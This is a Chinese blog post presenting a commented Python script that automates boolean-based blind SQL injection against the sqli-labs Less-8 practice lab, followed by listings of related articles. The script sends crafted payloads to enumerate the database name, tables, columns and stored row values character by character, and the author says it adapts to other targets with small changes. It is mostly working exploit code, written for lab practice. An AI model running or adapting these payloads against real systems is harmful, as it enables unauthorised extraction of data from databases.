SQL注入-布尔盲注脚本-注释版

已于 2024-08-04 02:55:43 修改
阅读量176 收藏
点赞数 1
文章标签: sql 数据库 oracle
于 2024-08-03 15:24:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dasdasdasvsdV/article/details/140891230
版权

 改代码可以直接用于sqli-labs第八关,其他关卡需要简单修改代码,可以按照数据库长度-数据库名-表数量-表长度-表名称等依次爆破

#布尔盲注脚本
#为了更加方便的进行布尔盲注,而且省略大部分重复且繁琐的步骤,故写下此脚本
#首先判断是否存在注入、注入点、闭合方式,再修改执行以下内容
import requests

global url # 目标url
url = "http://sqli-labs/Less-8/?id="

global chars # 需要爆破的字符集
chars = "abcdefghijklmnopqrstuvwxyz_@!#1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"

def send_payload(payload):
    #发送一个HTTP GET请求到指定的URL,并将请求的结果存储在变量r中
    r = requests.get(url + payload) 
    r.encoding = 'utf-8'
    if("You are in.......") in r.text:
        return True
    return False

# 1.获取数据库名的长度
def get_database_name_length():
    length = 0
    while True:
        payload = f" ' or (SELECT LENGTH(database())) = {length} --+"  # PAYLOAD
        #数据库的长度猜对了
        if send_payload(payload):
            print("数据库长度为:",length)
            return length
        length += 1

# 2.获取数据库名
def get_database_name(length):
    database = ""
    # 1~length 因为range的范围是[1,lengh+1)
    for i in range(1, length+1):   
        for char in chars:
            payload = f" 1' AND (SELECT ASCII(substr(database(),{i},1)))={ord(char)}--+" # PAYLOAD注意格式和括号,不要忘记--+
            if send_payload(payload): # 如果返回You are in...
                database += char
                print("数据库名称为:",database)
                break # 获取到该位置的字母后寻找下一位置的字母
    return database # 返回完整的数据库名

# 3.获取表的数量
def get_table_num(database):
    table_num = 0
    while True:
        payload = f" 1' AND (SELECT count(table_name) from information_schema.tables where table_schema='{database}')={table_num}--+"
        if send_payload(payload):
            print("表的数量为:",table_num)
            break
        table_num += 1

# 4.获取当前数据库下所有表名的长度
def get_table_name_length(database,table_num):
    table_name_length_list = [] # 用一个列表来存表名
    for i in range(0, table_num):
        table_name_length = 0
        while True:
            payload = f" ' OR LENGTH((SELECT table_name from information_schema.tables WHERE table_schema = '{database}' LIMIT {i},1))={table_name_length} --+"
            if send_payload(payload):
                print(f"第{i+1}个表的长度为",table_name_length)
                table_name_length_list.append(table_name_length)
                break
            table_name_length += 1
    return table_name_length_list

# 5.获取当前数据库下的所有表名
def get_table_name(database, table_num, table_name_length_list):
    table_name_list = []
    # 表的数量-LIMIT从0开始
    for i in range(0, table_num):
        table_name = '' # 每张表的名字
        # 根据每张表的长度爆破其每一位的字母
        for j in range(1, table_name_lentgh_list[i]+1):
            for char in chars:
                payload = f"' OR {ord(char)} = (SELECT ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='{database}' LIMIT {i},1),{j},1)))--+"
                if send_payload(payload):
                    # 拆解了一位
                    table_name += char
                    print(f"第{i+1}个表名为:",table_name)
                    break
        table_name_list.append(table_name)
    return table_name_list

# 6.获取当前数据库下的所有表的所有字段的个数
def get_column_num(database, table_name_list):
    for table_name in table_name_list:
        column_num = 0
        while True:
            payload = f"' OR {column_num} = (SELECT count(column_name) from information_schema.columns WHERE table_name='{table_name}')--+"
            if send_payload(payload):
                print("{}表的列数为:".format(table_name),column_num)
                break
            column_num = column_num + 1
        # 接下来就指定一个数据库做测试了
        column_length_list = get_column_length(database, table_name, column_num)
        # column_name_list = get_column_name(database, table_name, column_num, column_length_list)
        # data_num_list = get_data_num(database, table_name,column_name_list)
        # get_data(database,  table_name, column_name_list, data_num_list)

# 7.获取当前数据库下的所有表的每个字段的长度
def get_column_length(database, table_name, column_num):
    column_length_list = []
    for i in range(column_num):
        j = 0
        while True:
            payload = f"' OR {j} = (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_name='{table_name}' AND table_schema='{database}' LIMIT {i},1)--+"
            if send_payload(payload):
                print("{}表第{}列的长度为:".format(table_name, i+1), j)
                column_length_list.append(j)
                break
            j += 1
    return column_length_list

# 8.获取当前数据库下的所有表的每个字段的名字
def get_column_name(database, table_name, column_num, column_length_list):
    column_name_list = []
    for i in range(column_num):
        column_name = ""
        for j in range(1,column_length_list[i]+1):
            for char in  chars:
                payload = f"' OR {ord(char)} = (ASCII(SUBSTR((SELECT column_name from information_schema.columns WHERE table_name='{table_name}' limit {i},1),{j},1)))--+"
                if send_payload(payload):
                    column_name = column_name + char
                    print("{}表第{}列的值为:".format(table_name, i+1), column_name)
                    break
        column_name_list.append(column_name)
    return column_name_list

# 9.获取当前数据库下的当前表中的数据条数
def get_data_num(database, table_name, column_name_list):
    data_num_list = []
    for column_name in column_name_list:
        data_num = 0
        while True:
            payload = f"' OR {data_num} = (select count({column_name}) from {database}.{table_name})--+"
            if send_payload(payload):
                print("{}表的{}列共有{}条数据".format(table_name, column_name, data_num))
                data_num_list.append(data_num)
                break
            data_num += 1
    return data_num_list

# 10.获取当前数据库下的当前表中的值
def get_data(database,table_name,column_name_list,data_num_list):
    for i in range(len(data_num_list)):
        for j in range(data_num_list[i]):
            data_length = 0
            while True:
                payload = f"' OR {data_length} = (select length({column_name_list[i]}) from {database}.{table_name} limit {j},1)--+"
                if send_payload(payload):
                    print("{}表的{}列第{}条数据的值为:".format(table_name, column_name_list[i], j+1), data_length)
                    break
                data_length += 1
            data = ''
            for k in range(data_length):
                for char in chars:
                    payload_ = f"' OR {ord(char)} = (ASCII(SUBSTR(CAST((SELECT {column_name_list[i]} FROM {database}.{table_name} limit {j},1) AS CHAR), {k+1}, 1)))--+"
                    if send_payload(payload_): 
                        data = data + char
                        print("{}表的{}列第{}条数据的值为:".format(table_name, column_name_list[i], j+1), data)
                        break



if "__main__" == __name__:
    #1 length = get_database_name_length()
    #2 database = get_database_name(length)
    #3 table_num = get_table_num(database)
    #4 table_num_list = get_table_name_length(database,table_num)
    #5 table_name_list = get_table_name(database,table_num,table_name_lentgh_list)
    length = 8
    database = 'security'
    table_num = 4
    table_name_lentgh_list=[6,8,7,5]
    table_name_list = ['emails','referers','uagents','users']
    get_column_num(database, table_name_list)

拿不到Root啊
关注
《网络安全自学教程》- SQL注入布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 1万+
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
iwebsec靶场SQL注入-bool盲注
qq_56041380的博客
03-24 430
bool注入是盲注的一种。它于报错注入不同,布尔注入没有任何报错信息输出,页面返回只有正常和不正常两种状态,攻击者只能通过返回的这两种状态来对其进行判断输入的SQL注入语句是否正确,从而判断数据库中存储了那些信息。
sql注入-布尔盲注脚本
m0_58853680的博客
01-03 478
获取cms_users表中的username和password字段的值,并用冒号分隔(使用。USER_AGENT:模拟浏览器请求时使用的User-Agent头信息。实时打印已获取的部分数据库名,并在获取完整个名字后显示最终结果。若成功获取到长度不为None,则调用get_database_获取名为cms_users表的所有列名(同样使用group_接收一个参数content_length表示数据库名的长度。该函数利用SQL注入漏洞尝试获取数据库名或表名的长度。获取当前数据库中的所有表名(使用group_
Python自动化sql注入布尔盲注_布尔盲注脚本
2401_83739411的博客
04-07 993
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
sql注入布尔盲注-脚本
星空下de青铜
05-05 3008
sql注入布尔盲注-脚本 先给大家普及一下 在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。 information_schema数据库常用表说明: SCHEMATA表:提供了当前mysql实例中所有数据库的信息。如show databases就是在这查询的 TABLES表:提供了关于数据...
Python自动化sql注入布尔盲注
qq_46145027的博客
04-22 4270
sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
写一个布尔盲注脚本
weixin_35752645的博客
01-01 541
布尔盲注是一种数据库攻击技术,其目的是通过查询数据库并猜测结果来确定特定信息。布尔盲注的基本原理是,通过提交查询并猜测其真假,从而获取有关数据库中存储的信息的提示。 如果要写一个布尔盲注脚本,你需要以下步骤: 建立与数据库的连接。 编写 SQL 语句,并将其提交给数据库。 处理数据库的响应。如果响应为真,则可以推断出查询的条件是真的;如果响应为假,则可以推断出查询的条件是假的。 根据获得的信息,...
SQL注入之基于布尔盲注详解
09-10
布尔SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
sqlserver数据库布尔盲注_SQL注入之基于布尔盲注详解
weixin_30623181的博客
12-24 1309
基于布尔盲注Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。本次的示例就是Less-8。通过进行下面的语句的注入测试http://localhost...
布尔盲注(ctfhub)
2401_82985722的博客
03-27 1419
页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL注入。在注入语句后,盲注不是返回查询到的结果,而只是返回查询是否成功。?id=1' and 1=1--+ 真页面true?id=1' and 1=2--+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数一、手动注入一般顺序:爆数据库名长度。
布尔盲注python脚本.zip
12-28
GET和POST型python脚本
SQL注入布尔盲注
qq_45557130的博客
10-04 812
sql注入布尔盲注
Python 安全开发 布尔盲注脚本
YouthBelief的博客
12-03 1281
python开发-批量fofa+poc验证0x00 思路0x01 脚本编写1.fofa爬取步骤一:请求搜索地址 以 GlassFish 任意文件读取 为例 0x00 思路 要想批量验证漏洞是否存在需要考虑的点: 1.获取可能存在漏洞的地址信息。 1.1可借助fofa获取目标 影响本是 <= 4.1.1 fofa指纹 "GlassFish" && port="4848" && country="CN" 或者 "GlassFish" && port
python脚本实现布尔盲注
最新发布
求大佬师傅带
04-28 1006
相信师傅们在平常渗透测试中,偶尔会遇到布尔盲注的情况,但是手工的话太慢,上sqlmap流量又太大,特征太明显。所以用python脚本就是最优解,可以自定义user-agent等字段,注入速度等。
sql注入 布尔盲注基础脚本
树木常青的博客
03-03 1106
基础SQL注入过了一遍,盲注一直不太熟,在sqli-labs上练习时也是找到注入点后上sqlmap。今天学习用python写sql注入脚本,才发现很多语句不熟,从网上找了一篇教程,自己照着写了写,有些地方自己改了改,感觉收获很大。[这是参照的文章](https://www.cnblogs.com/lzlzzzzzz/p/13998552.html 以sqli-labs第八关为例写的 爆数据库名和表名 import requests s = reques...
基于python的布尔盲注爆破脚本sqli-libs第八关)
henghengzhao_的博客
10-06 1935
写这个脚本的原因是因为布尔爆破步骤的繁琐,因此写下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆破
SQL-LABS GET型布尔盲注脚本(node)
AaronLuo
09-03 370
原理 基于SQL-LABS LESS-5,LESS-8 GET型布尔注入,(布尔盲注详解),,基于MSQL 布尔盲注,主要是判断ascii码值是否与猜测的值相同,通过判断页面变化,确定ascii值 由于0-z的ascii值是48-122,256 = 2 ^ 0 + 2 ^ 1 + 2 ^ 2 + 2 ^ 3 + 2 ^ 4 +2 ^ 5 + 2 ^ 6 + 2^ 7 ,通过按位与运算8次,结果相加...
Bool盲注脚本
Forever_Han13的博客
01-21 678
import requests chars = "qwertyuiopasdfghjklzxcvbnm0123456789}{" url = "http://localhost/sqli-labs-kali2-master/Less-15/" for x in range(0, 10): table_name = "" for y in range(1, 20): for char in chars: payload = {
布尔盲注与时间盲注脚本
qq_51553814的博客
10-14 401
最近做的几道盲注题,写下的脚本 //布尔盲注 import requests url="http://192.168.0.126/html/sql/Less-8/?id=" flag='' for i in range(1,10): print(i) low=32 high=128 mid=(low+high)//2 while low<high: payload="1' and ascii(substr(database(),%d,1))&g
sql注入布尔盲注脚本
08-23
对于SQL注入布尔盲注攻击,你可以使用以下脚本示例: ``` SELECT * FROM users WHERE username = 'admin' AND IF(LENGTH(database()) > 1, SLEEP(5), 0); SELECT * FROM users WHERE username = 'admin' AND IF...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值